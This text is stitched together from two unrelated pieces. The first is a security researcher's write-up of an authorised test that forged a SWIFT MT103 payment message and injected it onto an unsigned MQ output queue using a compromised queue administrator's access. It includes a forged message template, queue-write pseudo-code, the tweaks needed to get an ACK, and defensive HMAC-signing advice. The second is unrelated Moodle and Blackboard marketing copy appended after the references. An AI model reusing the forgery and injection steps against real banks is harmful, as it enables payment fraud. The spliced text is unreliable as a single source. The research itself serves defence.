For Input messages, these blocks were not too much of a problem. The headers only really seemed to be used to flag whether the message was for training / testing or to flag if it was a possible duplicate, which syntactically took the following form:
Where “TNG” indicated “training” and “SPD” indicated “possible duplicate”.
However, with Output messages, it got considerably more complicated. An example of what the trailer and system block could look like on an Output message is the following:
A breakdown of these various values is:
Trailer ({5:}):
MAC – Message Authentication Code calculated based on the entire contents of the message using a key that has been exchanged with the destination bank and a secret algorithm;
CHK – A PKI checksum of the message body, used to ensure the message has not been corrupted in transit;
TNG – A flag to indicate that the message is a testing and training message.
System ({S:}):
SPD – Possible duplicate flag;
SAC – Successfully Authenticated and Authorized flag. This is only present if:
Signature verification was successful.
RMA (Relationship Management Application) authorization and verification was successful.
COP – Flag indicating that this is the primary message copy;
MDG – The HMAC256 of the message using LAU keys.
However, these seemed to only be values I would need to consider if I was to try and forge an “incoming” message from SWIFTNet or an 'outbound' message on the output of the SAG.
So.. I'll stick with crafting an "input" message trailer:
Now, having said all that, it turned out the trailer block did seem to sometimes hold a MAC code and a message checksum (sigh), meaning I actually needed to construct something like:
So that was +2 to my 'issues/blockers' list. However, issues aside, I now understood the complete message format, and could put it all together and save the following as a draft / template MT103 message:
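Assembled from the blocks covered so far, the draft template looked roughly like the following (a reconstruction; the angle-bracket placeholders mark values that could not yet be pre-determined):

```
{1:F01EBNKGB20AXXX<SESSION><SEQUENCE>}{2:I103FBNKFR20XXXXN}{3:{119:STP}{121:8b1b42b5-669f-46ff-b2f2-c21f99788834}}{4:
:20:TRANSACTIONRF103
:23B:CRED
:32A:200102GBP500000,00
:33B:GBP500000,00
:50K:/GB22EBNK88227712345678
JOHN DOE
JOHN'S BUSINESS LTD
21 JOHN STREET, LONDON, GB
:59:/FR20FBNK88332287654321
ALICE SMITH
ALICE'S COMPANY
10 ALICE STREET, PARIS, FR
:70:12345-67890
:71A:SHA
-}{5:{MAC:<MAC>}{CHK:<CHECKSUM>}}
```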
The session number, sequence number, MAC, and checksum were the areas of the message I was - at this point - unable to pre-determine. Nevertheless, a summary of what the message describes is:
Using the transaction reference “TRANSACTIONRF103”;
please transfer 500,000.00 GBP;
from John Doe, (IBAN: GB22EBNK88227712345678) at “English Bank” (BIC: EBNKGB20);
to Alice Smith (IBAN: FR20FBNK88332287654321) at “French Bank” (BIC: FBNKFR20);
Furthermore, please ensure the transaction charge is shared between the two institutions;
and mark the payment with a reference of “12345-67890”.
To wrap up this section, I wanted to take a moment to explain some logic behind the target of 500,000 GBP, as it is also important.
Aside from the many reasons it would be better to transfer (even) smaller amounts (which is an increasingly common tactic deployed by modern threat actors), why not go higher? This is where it’s important to understand the system and environment you are targeting.
In this instance, let's assume that by doing recon for a while I gathered the understanding that:
If a message comes from SYS which is over £500k;
even if it has been subject to a 4 eye check;
and even if it is flagged for STP processing;
route it to a verification queue and hold it for manual verification.
This was because a transaction over £500k was determined to be “abnormal” for SYS. As such, if my transaction was greater, the message would not propagate through all systems automatically.
OK, so now that I understood:
how the system worked;
how it communicated;
the fundamental structure of a raw MT103 payment messages;
and how much I could reliably (attempt) to transfer.
And with that, it was time to take a break from MT standards and establish an understanding of how I would even get into a position to put this into practice!
To place a message on a queue, I was going to need two things:
Access to the correct queue manager;
Write access to the correct queues.
Depending on the environment and organisation, access to queue managers could be quite different and complex. However a bare-bones setup may take the following form:
An MQ Administrator accesses their dedicated workstation using AD credentials;
They then remotely access a dedicated jump server via RDP which only their host is whitelisted to access;
This may be required as the queues may make use of Channel Authentication Records, authorizing specific systems and user accounts access to specific queues;
The channels may further be protected by MQ Message Encryption (MQME) which encrypts messages at rest based on specific channels. As such, even if someone was a “super duper master admin” they would only be able to read / write to queues specifically allocated to them within the MQME configuration file (potential target for another time?);
The MQ Admin can then use tools such via the Jump Server to read/write to their desired message queues.
So, in this scenario, to gain access to the message queues I - as an attacker - would need to compromise the MQ admin’s AD account and workstations, then use this to gain access to the jump host, from where I could then access the message queues given I knew the correct channel name and was configured with authorization to access it.. and maybe throw some MFA in there..
That is understandably a significant requirement! However, when discussing sophisticated attacks against Financial Market Infrastructure (FMI), it is more than reasonable to accept that an Advanced Persistent Threat (APT) would see this as a feasible objective - we don't need to dig into the history of how sophisticated attacks targeting SWIFT systems can be.
Next, it was time to finally identify a feasible attack vector for message forgery.
Now, with an idea of how to gain the right access, as well as an understanding of the various technologies and security controls in place, I updated my diagram:
You may have noticed I've added something called “LAU” around the SAA-to-SAG adapter, and another “LAU” to the MID-to-SAA MQ channels, which I have yet to explain. “Local Authentication” (LAU) is a security control implemented by SWIFT to authenticate messages using a pair of shared keys between two systems. These keys are combined and used to generate a SHA256 HMAC of the message and append it to the S block. This can then be validated by the recipient system. Effectively, this validates the origin and authenticity of a message. As such, even if an attacker was in position to introduce a fraudulent payment, they'd first need to compromise both the left and the right LAU signing keys, generate the correct HMAC, and append it to the message in order to have it accepted / processed successfully.
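The principle can be sketched in a few lines of Python (illustrative only - the real key handling, canonicalisation, and block formatting are specific to SWIFT's implementation and not shown here):

```python
import hashlib
import hmac

# Illustrative LAU-style signing: combine the left and right key halves,
# HMAC-SHA256 the message, and carry the result in the S block.
# Key values and message content are placeholders.
def lau_sign(message: bytes, left_key: str, right_key: str) -> str:
    combined_key = (left_key + right_key).encode()
    return hmac.new(combined_key, message, hashlib.sha256).hexdigest().upper()

signature = lau_sign(b"{1:F01...}{2:...}{4:...}", "LEFT-HALF", "RIGHT-HALF")
print("{S:{MDG:" + signature + "}}")
```

The recipient, holding the same two key halves, recomputes the HMAC and compares; a mismatch means the message was not produced by the trusted upstream system.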
But LAU aside, I now just needed to figure out which queue to target! There were a lot of queues to work with as each system essentially has multiple “input” and “output” queues. With that in mind, it was important to note that: an incoming message would require being in the format expected by the target system (from a specific upstream system) and an outgoing message would need to be in the format “produced” by one target system and “expected / ingested / processed” by its respective downstream system. So to figure this out, I worked backwards from the Gateway.
Targeting SAG
This was the least feasible attack vector!
I hadn't really looked into how the SWIFT adapters worked (if only I could research literally everything);
SAA and SAG implemented LAU on messages sent between them - An excellent security control!;
The output of SAG was directly on to SWIFTNet, which would entail all sorts of other complications (this is an understatement)!
Next!
Targeting SAA
So what if I wanted to drop a message on the “outbound” channel of SAA?
LAU and the SWIFT adapter aside, remember those session and sequence numbers? Well, messages which leave SAA are in the near-final stages of their outbound life-cycle, and as far as I understood would need to have valid session and sequence values. Given I didn't know how to generate these values without gaining access to SAA or how they worked in general (and let's not forget the LAU signing), this didn't currently seem feasible.
Next!
Targeting SANCT
This solution didn't actually transport messages back and forth; it just read messages off the queues and performed checks on their details. Not much I wanted to leverage here.
Targeting MID
To target MID, I could try and inject a message onto SAA's "input" queue, or the "output" queue of MID. This would only need to match the format of messages produced by the Middleware solution (MID). Following this, in theory, the (initial) message session and sequence number would be added by SAA, along with the UETR. This was promising!
However, MID was a SWIFT "message partner", which are typically solutions developed using the Alliance Access Development Kit that allows vendors to develop SWIFTNet-compatible software and, consequentially, implement LAU. So again, in order to forge a message here, I'd need to compromise the left and right LAU signing keys used between SAA and MID, manually HMAC the message (correctly!), and then place it on the correct queue.. This also no longer looked promising..
Targeting SYS
OK, how about the input of the next system down - the 'Payment System'?
As described previously, the inbound data was a custom "application specific" payment instruction from the institution's back-office systems, and not a SWIFT MT message. This would be an entirely new core concept I'd need to reverse - not ideal for this project.
But how about the output queue?
Although SYS received custom-format data, I found that it output what seemed to be an initial SWIFT MT message. This was perfect! Additionally, SYS did not have LAU between itself and MID because (unlike MID) SYS was not a SWIFT message partner, and was just one of many-many systems within the institution that formed their overall payment landscape.
Additionally, because SYS was essentially just one small piece of a much larger back-office architecture, it was not part of the SWIFT Secure Zone (after all, you can't have your entire estate in the Secure Zone - that defeats the purpose) and, as such, made use of the Queue Manager within a more accessible section of the general corporate environment (QM1).
With this in mind, and having - in theory - compromised the MQ admin, I could leverage their access on the corporate network to authenticate to QM1. I could then - in theory - write a fraudulent payment message to the SYS "output" queue, which we will call "SYS_PAY_OUT_Q" from here on.
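In pseudo-code (a pymqi-style API; every connection detail here is a placeholder, not the client's environment), the eventual write would boil down to something like:

```python
# Pseudo-code sketch: connect as the compromised MQ admin and write the
# forged MT103 directly to the SYS output queue, where MID would ingest
# it as if SYS had produced it. All names below are illustrative.
qmgr = pymqi.connect("QM1", "ADMIN.SVRCONN", "mq-host.corp.example(1414)")
queue = pymqi.Queue(qmgr, "SYS_PAY_OUT_Q")
queue.put(forged_mt103_bytes)
queue.close()
qmgr.disconnect()
```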
OK! It seems like I finally had an idea of what to do! But before I could put it into practice, I of course needed to create a diagram of the attack:
I think it's important to take a minute to refer back to the concept of "trust", which is what led to this attack diagram. My theory behind why this may work is that the MID application implicitly trusts whatever it receives from its respective upstream systems. This is intentional, as by design the security model of the payment landscape ensures that at any point a message can be created, a 4 (or 6) eye check is performed. If there is a system whose purpose it is to ensure the validity of a payment message at any point upstream, the downstream systems should have no real issue processing that message (with some exceptions). After all, it would be next to impossible to maintain a high-throughput payment system without this design.
And with that said, the plan was now clear:
Leverage the access of a Message Queue administrator;
to abuse the “trust relationship” between SYS, MID, and SAA;
to introduce a fraudulent payment message directly on to the output queue of SYS;
by leaning on my new found understanding of complete MT103 payment messages.
It was finally time to try to demonstrate a Proof-of-Concept attack!
So at this point I believe I had everything I needed in order to execute the attack:
The target system!
The message format!
The queue manager!
The queue!
The access requirements!
The generously granted access to a fully functional SWIFT messaging architecture! (that’s a good one to have!)
The extra-generously granted support of various SMEs from the target institution! (This was even better to have!)
Message Forgery
I needed to begin by creating a valid payment message using valid details from the target institution. So before moving on I was provided with the following (Note: as with many things in this post, these details have been faked):
Debtor Account Details – John Doe, GB12EBNK88227712345678 at EBNKGB20
Creditor Account Details – Alice Smith, GB15EBNK88332287654321 at EBNKGB20
Some of you may have noticed that the sending and receiving BICs are the same. This was because, for the sake of the research, I wanted to send the message back to the target institution via SWIFTNet so that I could analyse its full end-to-end message history. Furthermore, you may have noticed we are using a 'test & training' BIC (where the 8th character is a 0) - this was to make sure, you know, that I kept my job.
But yes, with access to these 'valid' account details and the knowledge gained during the research so far, I could now forge a complete Input MT103 message:
Note: Field 33B is actually an optional field; however, the MT standard states that “If the country codes of both the Sender’s and the Receiver’s BIC belong to the country code list, then field 33B is mandatory”. As such, if 33B was not present in the message, it would fail network validation rules and SWIFTNet would return a NAK with the error code D49.
Optional / mandatory fields aside, it was not quite that simple! There were a few minor changes I needed to make based on the specific point in the message's life-cycle at which I was planning to introduce it!
As I list these changes, remember that the objective was to introduce the message to the output queue of SYS (which sits before MID, SAA and SAG):
The first 3 blocks needed to be placed on a single line;
Remove field 121 (UETR) from the User Header, as this would be generated by SAA during processing;
Remove 1 character from the transaction reference as it needed to be exactly 16 characters (classic user error);
Write the decimal point in the transaction amount as a comma - otherwise it would fail syntax validation rules;
Ensure the IBANs were real and accurate, otherwise it seemed the message would fail some type of signature validation on the SWIFT network. The IBANs are fake here, but during the real PoC we used accurate account details in collaboration with the target institution;
Remove the trailer block (5) - as this would be appended by SAA during processing;
Remove the System Block (S) - as this would be completed by the SAG.
And the final message was as follows:
Note that the location at which I introduced the message resolved all of the 'issues / blockers' I'd tracked whilst researching the message structure! It would seem the further upstream you go, the easier the attack becomes - as long as MQ is still used as a transport medium.
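To make the shape of the final artefact concrete, here is a rough Python sketch of assembling such a message with the tweaks above applied. Every value (BICs, references, names, amounts) is faked, and the exact field selection is my own illustrative assumption rather than the real PoC message:

```python
# Illustrative sketch only: all BICs, references, names and amounts are faked,
# and the exact field selection is an assumption, not the real PoC message.

def build_injected_mt103() -> str:
    # Blocks 1-3 on a single line, as required at this injection point.
    # No {121:} UETR (SAA generates it), no block 5 trailer and no S block
    # (both are appended downstream by SAA / SAG).
    header = (
        "{1:F01EBNKGB20AXXX0000000000}"  # basic header, 'test & training' BIC
        "{2:I103EBNKGB20XXXXN}"          # application header: Input MT103
        "{3:{108:MT103INJECT0001}}"      # user header (no UETR)
    )
    body = "\n".join([
        "{4:",
        ":20:FRAUDREF12345678",          # reference: exactly 16 characters
        ":23B:CRED",
        ":32A:200103GBP100,00",          # comma used as the decimal separator
        ":33B:GBP100,00",                # kept in, per the validation rule above
        ":50K:/GB12EBNK88227712345678",  # debtor: John Doe
        "JOHN DOE",
        ":59:/GB15EBNK88332287654321",   # creditor: Alice Smith
        "ALICE SMITH",
        ":71A:SHA",
        "-}",
    ])
    return header + body

message = build_injected_mt103()
```

Field 33B is retained because of the network validation rule quoted earlier; everything the downstream systems normally append (UETR, trailer, S block) is deliberately absent.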
Message Injection
Now I had my raw MT103 message, I just needed to save it to a file (“Message.txt” - sure, why not) and place it onto the “SYS_PAY_OUT_Q” queue using one of the admin's tools:
With access to a sole MQ Administrator's AD account;
We connected to the MQ admin's machine;
Logged into the Jump Server;
Opened our MQ tool of choice and authenticated to the queue manager (QM1) where the output queue for SYS was managed;
Connected to the 'SYS_PAY_OUT_Q' queue;
Selected my forged “Message.txt” file;
Invoked the “write to queue” function;
And it was off!
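For illustration, the "write to queue" step above can be sketched in Python. The real PoC used the admin's own graphical tooling; the queue-put callable here is deliberately abstract, and the pymqi usage in the comment is an assumed stand-in (channel and host names invented):

```python
# Hedged sketch of the injection step. The real PoC used the admin's own GUI
# tooling; the put callable below stands in for its "write to queue" function.
from typing import Callable

def inject_message(path: str, put: Callable[[bytes], None]) -> bytes:
    """Read a raw MT103 from disk and write it to a queue via `put`."""
    with open(path, "rb") as fh:
        payload = fh.read()
    put(payload)  # the equivalent of the tool's "write to queue" button
    return payload

# With IBM's pymqi client, this might look like (assumed, not the real setup):
#   import pymqi
#   qmgr = pymqi.connect("QM1", "ADMIN.SVRCONN", "mq.corp.example(1414)")
#   queue = pymqi.Queue(qmgr, "SYS_PAY_OUT_Q")
#   inject_message("Message.txt", queue.put)
#   queue.close(); qmgr.disconnect()
```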
Logging in to Alliance Access and opening the message history tab, we sat waiting for an update. Waiting, waiting, waiting… waiting… and..
ACK! It worked!
That's a joke; did we hell receive an ACK!
See, this last section is written slightly more 'linearly' than what actually happened. Remember those 'tweaks' used to fix the message in the previous section? I hadn't quite figured those out yet..
So roughly seven NACKs later - each time troubleshooting and then fixing a different issue - we did indeed see an ACK! The message was successfully processed by all systems, passed target system validation rules, passed sanctions and AML screening, passed SWIFTNet validation rules, and SWIFT’s regional processor had received the message and sent an 'Acknowledgement of receipt' response to the sending institution!

For the sake of completeness, I’ve included the ACK below:
And of course a breakdown of what it all means:
Name | Value | Context
Basic Header Flag | 1 | Block 1
Application Type | F | F = FIN Application
Message Type | 21 | 21 = ACK
Institution Code | EBNKGB20AXXX | EBNKGB20 (BIC), A (Logical Terminal), XXX (Branch)
Sequence and Session No. | 1947392344 | 1947 (Sequence No.), 392344 (Session No.)
Date Tag (177) | 2001031102 | 200103 (Date), 1102 (Time)
Accept / Reject Tag (451) | 0 | 0 = Accepted by SWIFTNet
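That breakdown can be reproduced mechanically. Below is a small Python sketch that parses an ACK of this shape; the raw string is my own reconstruction from the fields in the table, not the literal message received:

```python
# Parses a SWIFT ACK service message of the shape described in the table.
# The example string is reconstructed from the table's values for illustration.
import re

ACK = "{1:F21EBNKGB20AXXX1947392344}{4:{177:2001031102}{451:0}}"

def parse_ack(raw: str) -> dict:
    # Basic header: app type (F), message type (21), 12-char logical terminal,
    # then the sequence and session numbers as laid out in the table above.
    hdr = re.match(r"\{1:(F)(\d{2})(.{12})(\d{4})(\d{6})\}", raw)
    app, mtype, lt, seq, sess = hdr.groups()
    # Block 4 tags: 177 (local date/time) and 451 (accept/reject).
    tags = dict(re.findall(r"\{(\d{3}):([^}]*)\}", raw))
    return {
        "application": app,             # F = FIN application
        "message_type": mtype,          # 21 = ACK
        "logical_terminal": lt,         # BIC + terminal code + branch
        "sequence": seq,
        "session": sess,
        "local_time": tags.get("177"),  # YYMMDDHHMM
        "accepted": tags.get("451") == "0",
    }
```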
Excellent! WooHoo! It worked! .. That took a lot of time and effort!
Closer Inspection
But the ACK wasn't enough, I wanted to make sure I understood what had happened to the message throughout its life-cycle. From the message I placed on the initial queue, to being processed by SWIFTNet.
Thankfully, as we sent the message back to the target institution we could see its entire message history. I already knew what the raw message placed on the queue looked like, so I wanted to focus on what became of the message once it had been processed by SAA:
The end-to-end tracking UUID had been generated and added (b42857ce-3931-49bf-ba34-16dd7a0c929f) in block 3;
The message trailer had been added ({5:{TNG:}}) where I could see that - due to the BIC code used - SAA had flagged the message as 'test and training'.
Additionally, an initial System Block segment had been added ({S:{SPD:}}), tagging the message as a possible duplicate. I wonder why - *cough* 7th attempt *cough*?
OK, so that was SAA. Now let’s see how it looked once it passed through the Gateway and regional processor:
OK, we can see a few changes now.
The session and sequence numbers have been populated (1947392344);
The I/O identifier in block 2 has been updated to track that it is now an 'Output' message;
The additional data within Block 2 is a combination of the input time, date, BIC, session and sequence numbers, output date/time, and priority;
The trailer has been updated with a message authentication code (MAC) calculated based on the entire contents of the message using a pre-shared key and a secret algorithm;
Additionally, a checksum of the message body has been stored within the trailer’s “CHK” tag. This is used by the network to ensure message integrity.
I also took a look at the entire outbound message history, just to see all the “Success” and “No violation” statements to make it feel even more awesome!
So that's that really..
With a bit of research and support I was able to demonstrate a PoC for introducing a fraudulent payment message to move funds from one account to another, by manually forging a raw SWIFT MT103 single customer credit transfer message, and leveraging various system trust relationships to do a lot of the hard work for me!
As mentioned briefly in the introduction, this is not something I have really seen or heard of happening in practice or in the 'wild'. Perhaps because it clearly takes a lot of work.. and there is a huge margin for error. However, if an adversary has spent enough time inside your network and has had access to the right documentation and resources, this may be a viable attack vector. It definitely has its benefits:
No need to compromise multiple payment operators;
No requirement to compromise - or establish a foothold within - the SWIFT Secure Zone;
No requirement to bypass MFA and gain credentials for a messaging interface;
No generation of application user activity logs;
No payment application login alerts;
No bespoke app-specific and tailored malware;
And all the other things associated with the complex task of gaining and leveraging payment operator access.
All an attacker may need to do is compromise one specific user on the corporate network: a Message Queue administrator.
The industry is spending a lot of time and effort focused on securing their payment systems, applications, processes, and users to keep - among other things - payment operators safe, Messaging Interfaces locked down, and SWIFT systems isolated. But the reality is, the most valuable and most powerful individual in the entire model might just be a single administrator!
As always, a security model is only as strong as its weakest link. If you're not applying the same level of security to your wider institution, there may very well be many weak links within the wider network which chain together and lead to the compromise of systems that feed into your various payment environments.
I think the main thing to remember when reflecting on this research is that it did not abuse any vulnerabilities within the target institution's systems, or even vulnerabilities or weaknesses within the design of their architecture. It simply leverages the legitimate user access of the Message Queue administrators and the trust relationships that exist by design within these types of large-scale payment processing systems.
So the harsh reality is, there is no particular list of recommendations for preventing this type of attack in itself. However, the main point to drive home is that you must ensure the security of your users - and overall organisation - is of a high enough standard to protect your highest privileged users from being compromised. Things such as:
Strong monitoring and alerting controls for anomalous behaviour;
Requirements for Multi-Factor authentication for access to critical infrastructure;
Segregation of critical infrastructure from the wider general IT network;
Strong password policies;
Well rehearsed incident detection and incident response policies and procedures;
Frequent high-quality security awareness training of staff;
Secure Software Development training for your developers;
Routine technical security assessments of all critical systems and components;
The use of 3rd party software from reputable and trusted vendors;
However, in the context of Message Queues, there is one particular control which I think is extremely valuable: the implementation of channel-specific message signing! This, as demonstrated by SWIFT's LAU control, is a good way to ensure the authenticity of a message.
As discussed, LAU is - as far as I know at the time of writing - a SWIFT product / message partner specific control. However, its concept is universal and could be implemented in many forms, two of which are:
Update your in-house applications to support message signing, natively;
Develop a middleware component which performs message signing on each system, locally.
This is a complex requirement, as it demands considerable effort on the client’s behalf to implement either approach. However, SWIFT provides guidance within their Alliance Access Developers guide on how to implement LAU in Java, Objective C, Scala and Swift:
Strip any S block from the FIN message input. Keep only blocks 1: through 5;
Use the FIN message input as a binary value (unsigned char in C language, byte in Java). The FIN message input must be coded in the ASCII character set;
Combine the left LAU key and the right LAU key as one string. The merged LAU key must be used as a binary value (unsigned char in C language, byte in Java). The merged LAU key must be coded in the ASCII character set;
Call a HMAC256 routine to compute the hash value. The hash value must also be treated as a binary value (unsigned char in C language, byte in Java). The HMAC size is 32 bytes;
Convert the HMAC binary values to uppercase hexadecimal printable characters.
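The five steps above can be sketched in Python (the guide targets Java, Objective C, Scala and Swift, so this is a translation, and the S-block handling assumes the S block, when present, is the final block):

```python
# Sketch of the LAU signing steps above, assuming HMAC-SHA256 and that the
# S block, when present, is the final block of the FIN message.
import hashlib
import hmac

def lau_signature(fin_message: str, left_key: str, right_key: str) -> str:
    # 1. Strip any S block; keep only blocks 1 through 5.
    body = fin_message.split("{S:")[0]
    # 3. Combine the left and right LAU keys into one ASCII byte string.
    key = (left_key + right_key).encode("ascii")
    # 2 & 4. Treat the message as ASCII bytes and compute the 32-byte HMAC.
    digest = hmac.new(key, body.encode("ascii"), hashlib.sha256).digest()
    # 5. Convert to uppercase hexadecimal printable characters.
    return digest.hex().upper()
```

A receiving system holding the same key pair would recompute this value over the message it pulled from the queue and compare it with the signature supplied alongside, rejecting the message on any mismatch.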
An example of how this may work in the more flexible middleware solution proposed is where the original service is no longer exposed to the network, and is altered to only communicate directly with the custom 'LAU-esque' service on its local host. This service would then sign and route the message to its respective queue.
When received, the core of the recipient payment service would seek to retrieve its messages from the queues via the 'LAU-esque' signing middleware, which would retrieve the message and subsequently verify its origin and authenticity by re-calculating the signature using their shared (secret) keys. Key-pairs could further be unique per message flow. This design could allow for the signing to be used as a way to validate the origin of a message even if it had passed through multiple (local) intermediary systems.
As a final bit of creative effort, I made yet another diagram to represent what this could perhaps look like - if life was as easy as a diagram:
If you made it this far thanks for reading all.. ~6k words!? I hope you found some of them interesting and maybe learned a thing or two!
I'd like to express my gratitude to the institution that facilitated this research, as well as to the various SMEs within that institution who gave their valuable time to support it throughout.
Fineksus - SWIFT Standard Changes 2019
https://fineksus.com/swift-mt-standard-changes-2019/
Paiementor - SWIFT MT Message Structure Blocks 1 to 5
https://www.paiementor.com/swift-mt-message-structure-blocks-1-to-5/
SEPA for corporates - The Difference between a SWIFT ACK and SWIFT NACK
https://www.sepaforcorporates.com/swift-for-corporates/quick-guide-swift-mt101-format/
SEPA for corporates - Explained: SWIFT gpi UETR – Unique End-to-End Transaction Reference
https://www.sepaforcorporates.com/swift-for-corporates/explained-swift-gpi-uetr-unique-end-to-end-transaction-reference/
M DIBA - LAU for SWIFT Message Partners
https://www.linkedin.com/pulse/lau-swift-message-partners-mohammad-diba-1/
Prowide - About SWIFT
https://www.prowidesoftware.com/about-SWIFT.jsp
Microsoft - SWIFT Schemas
https://docs.microsoft.com/en-us/biztalk/adapters-and-accelerators/accelerator-swift/swift-schemas
SWIFT FIN Guru - SWIFT message block structure
http://www.swiftfinguru.com/2017/02/swift-message-block-structure.html

10 Common Myths About Moodle Development Consulting.
Moodle is the most widely used learning management system
Moodle is one of the most flexible learning management systems. It has the largest number of active users and developers, thanks to its adaptability and extensive feature set. The worldwide user base is estimated to be over 68 million, and there are currently 46,507 registered sites in 241 countries (Moodle.net).
Moodle is an open-source course management system
Moodle is an incredibly successful open-source project and has thousands of regular community contributors who continue to push its core functionality. Even with its high-end feature set, Moodle is completely free!
The largest number of Moodle registrations come from the United States
With 7,061 registrations, the United States has the highest number of registrations for Moodle LMS in the world. The rest of the top 10 countries were Spain (5,375), Brazil (3,240), the United Kingdom (2,527), Mexico (1,911), Germany (1,596), Colombia (1,394), Italy (1,368), Australia (1,153) and the Russian Federation (1,130).
Moodle stands for Modular Object-Oriented Dynamic Learning Environment
The openly shared, open-source platform known as Moodle really stands for Modular Object-Oriented Dynamic Learning Environment, which explains how it got its uncommon-sounding title. Moodle is also a verb that describes lazily meandering through something, doing things as they occur to you - a pleasurable tinkering that often leads to creativity and insight. It may speak to how Moodle was actually formed.
Hire a Moodle development company
Moodle is surprisingly easy to use
Despite its complicated-sounding name, Moodle software is relatively easy to use. The installation process is a bit technical, but once you’re up and running, you only really need basic web browsing skills to take advantage of this LMS.
There are hundreds of Moodle plugins
The functionality of the Moodle program can be extended with plugins, of which there are over 1,000. All plugins are catalogued in the Moodle Plugins directory.
Change the look and feel of a Moodle site by installing graphical themes
Want to customize the appearance of your Moodle site? Interested in improving the look and quality of a course? By taking advantage of Moodle themes, which can be downloaded directly from the Moodle download site, you can easily change the visual aspect of your courses.
Moodle can be used on mobile devices
Mobile usage is exploding right now, so it’s good to know that some Moodle themes are mobile-friendly and use responsive web design. The Moodle mobile app can also be downloaded on most mobile platforms.
Moodle can run on a variety of systems
Any system that supports PHP and databases can run Moodle, including Unix, Linux, Windows, Mac OS X, NetWare, FreeBSD, and even most web host providers.
Moodle
Moodle is open-source software using a “freemium” payment model, which means you get the basics for free but have to pay for additional options. According to recent surveys, it is one of the most popular LMSs, mostly used by institutions with between 1,000 and 2,000 full-time students.
One of the main disadvantages of this system is that it is very difficult to install and fix. There are many companies that can help with setting up and customizing the system, but their services are quite expensive. Moodle is perfectly suited for general educational goals, but to implement it, a company must have at least one qualified IT specialist, as well as a separate server and hardware. Moodle is already free, but the additional cost can be $10,000/year, not including IT department salaries.
Key Features of Moodle:
grade management; student roster / attendance management; evaluation implementation; discussion forum; lesson planner; collaboration management; file exchange; internal messaging; live chat; wiki
Moodle provides specialized modules to create courses (Moodle Rooms) that can be used in situ or migrated to another LMS. The main problem with this system is that it requires additional time and effort to adapt and implement — up to 18–24 months. If you can allow such time-consuming projects without any harm to your company, then Moodle is an excellent solution for your business.
Blackboard
Blackboard is an industry-leading LMS, which is comprehensive and flexible, but expensive. Detailed pricing information is not publicly available, but the cost depends on how many licenses you need. It is already used by a lot of schools and is considered great value for money, especially for large institutions with lots of resources.
Blackboard excels in curriculum creation: a trainer can upload and manage all the materials he needs. However, if additional practice or implementation assistance is required, it can be difficult to discover and hire a qualified Blackboard professional.
Key Features of Blackboard:
Custom branding, fields, and functionality; test engine; multiple delivery formats; administrative reporting; course catalog; data import/export; grading; individual plans; student portal; goal setting; skill tracking.
The system lacks collaboration features and doesn’t excel at email integration, but offers self-paced instruction methods and resource management.
Conclusion
The Moodle platform is a great learning platform for teachers. Its flexibility and feature set allows for extensive customization and effective curriculum development. Its experience, as you just found out, is also kind of engaging. If you want a free Moodle instance, you can visit Moodle’s new cloud service, https://moodlecloud.com/en/.
If you want to take Moodle even further with the many plugins and themes contact creators to see how far you can go.
What is your Moodle dream? The reasoning I keep discovering is: “we want to base our online engagement on a company that has a history and can be expected to carry our future, not on a public shareware-type product.”
What people fail to realize is that Moodle is in every way as commercial a product as Blackboard. This is accomplished by creating certified “Moodle Partners”. These partners provide all of the same services and assistance Blackboard provides to its customers, through commercial agreements enforceable by law. The big difference, however, is that you don’t have to pay for a Moodle license, so the $100,000 budget Jack is talking about becomes 100% training, support, and customization. What we strive for is that the money saved by eliminating the license fee can be used for additional faculty training, which we will be happy to deliver. This brings up some other benefits of Moodle that may or may not fit the Mythbuster documentation, but here is what they’re worth:
Pros for Moodle:
1) If you want to do something that hasn’t been done before, you can create a new module yourself.
2) Licensing: you must share your module with the Moodle community for free. A huge library of modules has already been built like this.
3) If you don’t like the service or solution you get from the Moodle partner you are working with, you can simply buy from a different Moodle partner.
Cons for Blackboard:
1) Blackboard has its own roadmap that may or may not include the feature you were hoping for.
2) Blackboard does provide building blocks, but they are mostly commercially licensed, whereas the Moodle modules are all free under the Moodle open source license.
3) If you don’t like the service or solution you get from Blackboard, there’s nothing you can do about it other than switch to WebCT (oh, wait, you can’t do that now!).